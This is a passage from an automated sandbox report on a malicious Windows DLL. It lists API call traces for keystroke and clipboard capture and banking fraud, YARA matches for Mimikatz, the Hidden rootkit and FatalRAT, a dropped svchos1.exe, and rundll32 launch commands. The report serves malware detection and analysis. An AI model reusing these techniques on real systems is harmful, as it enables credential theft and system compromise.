                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10002770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,3_2_10002770
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100029D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_100029D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10017BB0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,3_2_10017BB0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100025B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,0_2_100025B0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000B840 GetKeyState,Sleep,lstrlenA,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcatA,lstrlenA,lstrcatA,lstrcatA,0_2_1000B840

                  E-Banking Fraud

                  barindex
                  Source: C:\Windows\System32\loaddll32.exeCode function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe0_2_1000BFE0
                  Source: C:\Windows\System32\loaddll32.exeCode function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe0_2_1000BFE0
                  Source: C:\Windows\System32\loaddll32.exeCode function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe0_2_1000BFE0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe3_2_1000BFE0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe3_2_1000BFE0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe3_2_1000BFE0

                  System Summary

                  barindex
                  Source: ZfJheGhddq.dll, type: SAMPLEMatched rule: Detects Mimikatz strings Author: Florian Roth
                  Source: ZfJheGhddq.dll, type: SAMPLEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: ZfJheGhddq.dll, type: SAMPLEMatched rule: Detects FatalRAT Author: ditekSHen
                  Source: 0.2.loaddll32.exe.100fbd38.2.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 3.2.rundll32.exe.1010b380.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 4.2.rundll32.exe.1010b380.2.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 3.2.rundll32.exe.1010b380.1.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 3.2.rundll32.exe.100fbd38.2.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 4.2.rundll32.exe.100fbd38.1.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 4.2.rundll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 0.2.loaddll32.exe.1010b380.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 0.2.loaddll32.exe.1010b380.1.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 0.2.loaddll32.exe.100fbd38.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 3.2.rundll32.exe.100fbd38.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 4.2.rundll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
                  Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects FatalRAT Author: ditekSHen
                  Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
                  Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects FatalRAT Author: ditekSHen
                  Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Mimikatz strings Author: Florian Roth
                  Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects the Hidden public rootkit Author: ditekSHen
                  Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects FatalRAT Author: ditekSHen
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000E670: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,0_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10010190 AttachConsole,AttachConsole,Sleep,AttachConsole,GetConsoleProcessList,GetConsoleProcessList,#823,GetConsoleProcessList,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,#825,FreeConsole,FreeConsole,Sleep,FreeConsole,TerminateProcess,swprintf,SHDeleteKeyA,OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryA,GetSystemDirectoryA,lstrcatA,lstrcatA,DeleteFileA,DeleteFileA,GetSystemDirectoryA,lstrcatA,DeleteFileA,LocalFree,free,free,free,GetWindowsDirectoryA,GetCurrentProcess,IsWow64Process,DeleteFileA,SetServiceStatus,ExitProcess,0_2_10010190
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10010640 ExitWindowsEx,0_2_10010640
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000E670 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,0_2_1000E670
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10010640 ExitWindowsEx,3_2_10010640
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000E670 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,3_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100580600_2_10058060
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100810900_2_10081090
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100971900_2_10097190
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100041D00_2_100041D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1003B2100_2_1003B210
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1002A2600_2_1002A260
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100932B00_2_100932B0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1007E2D00_2_1007E2D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1003E4700_2_1003E470
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100373F00_2_100373F0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1003C4120_2_1003C412
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1001A4200_2_1001A420
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1005B4200_2_1005B420
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000A5800_2_1000A580
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1007E5800_2_1007E580
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100965800_2_10096580
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100935E00_2_100935E0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100945E00_2_100945E0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100356970_2_10035697
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100287B00_2_100287B0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100297D00_2_100297D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1003E4900_2_1003E490
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100308D00_2_100308D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100599000_2_10059900
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100809100_2_10080910
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1007E9600_2_1007E960
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10095A100_2_10095A10
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1005BAB00_2_1005BAB0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1007FAF00_2_1007FAF0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10081AF00_2_10081AF0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10091B300_2_10091B30
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1003BB900_2_1003BB90
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10082D700_2_10082D70
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10059DB00_2_10059DB0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10083DB00_2_10083DB0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1007ADD00_2_1007ADD0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10084DD00_2_10084DD0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10037E100_2_10037E10
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1005AEA00_2_1005AEA0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10093F400_2_10093F40
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10023F600_2_10023F60
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10078F700_2_10078F70
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100580603_2_10058060
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100810903_2_10081090
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100971903_2_10097190
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100041D03_2_100041D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003B2103_2_1003B210
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002A2603_2_1002A260
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100932B03_2_100932B0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1007E2D03_2_1007E2D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003E4703_2_1003E470
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100373F03_2_100373F0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003C4123_2_1003C412
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001A4203_2_1001A420
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1005B4203_2_1005B420
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000A5803_2_1000A580
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1007E5803_2_1007E580
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100965803_2_10096580
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100935E03_2_100935E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100945E03_2_100945E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100356973_2_10035697
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100287B03_2_100287B0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100297D03_2_100297D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003E4903_2_1003E490
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100308D03_2_100308D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100599003_2_10059900
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100809103_2_10080910
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1007E9603_2_1007E960
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10095A103_2_10095A10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1005BAB03_2_1005BAB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1007FAF03_2_1007FAF0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10081AF03_2_10081AF0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10091B303_2_10091B30
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003BB903_2_1003BB90
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10082D703_2_10082D70
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10059DB03_2_10059DB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10083DB03_2_10083DB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1007ADD03_2_1007ADD0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10084DD03_2_10084DD0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10037E103_2_10037E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1005AEA03_2_1005AEA0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10093F403_2_10093F40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10023F603_2_10023F60
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10078F703_2_10078F70
                  Source: C:\Windows\System32\loaddll32.exeCode function: String function: 1001B690 appears 31 times
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001B690 appears 31 times
                  Source: ZfJheGhddq.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                  Source: ZfJheGhddq.dll, type: SAMPLEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: ZfJheGhddq.dll, type: SAMPLEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: ZfJheGhddq.dll, type: SAMPLEMatched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: 0.2.loaddll32.exe.100fbd38.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 3.2.rundll32.exe.1010b380.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 4.2.rundll32.exe.1010b380.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 3.2.rundll32.exe.1010b380.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 3.2.rundll32.exe.100fbd38.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 4.2.rundll32.exe.100fbd38.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 4.2.rundll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 0.2.loaddll32.exe.1010b380.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 0.2.loaddll32.exe.1010b380.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 0.2.loaddll32.exe.100fbd38.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 3.2.rundll32.exe.100fbd38.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 4.2.rundll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: ZfJheGhddq.dllBinary string: \Device\QAssist\DosDevices\QAssistQAssist!InitializeDevice[irql:%d,pid:%d][error]: Error, device creation failed with code:%08x
                  Source: ZfJheGhddq.dllBinary string: \Device\QAssist\DosDevices\QAssist
                  Source: ZfJheGhddq.dllBinary string: \??\\Device\\SystemRoot\QAssist!CheckProtectedOperation[irql:%d,pid:%d][warning]: Warning, can't update initial state for process: %p
                  Source: ZfJheGhddq.dllBinary string: \Device\
                  Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@20/1@0/0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100290C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_100290C0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1001B690 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,0_2_1001B690
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100290C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,3_2_100290C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001B690 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,3_2_1001B690
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1001B250 GetTickCount,GetVersionExA,getsockname,GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,GetDriveTypeA,GetDiskFreeSpaceExA,GetTickCount,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetLastInputInfo,GetTickCount,_access,lstrcpyA,0_2_1001B250
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100270F0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_100270F0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1001A100 CoInitialize,CoCreateInstance,GetDriveTypeA,SysFreeString,SysFreeString,CoUninitialize,0_2_1001A100
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1001EFD0 Shellex,#823,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,0_2_1001EFD0
                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\Public\Documents\MM\svchos1.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1916:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4064:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1736:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
                  Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ZfJheGhddq.dll,Shellex
                  Source: ZfJheGhddq.dllReversingLabs: Detection: 65%
                  Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll"
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ZfJheGhddq.dll,Shellex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ZfJheGhddq.dll,ShellexJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MMJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: mfc42.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: msvcp60.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
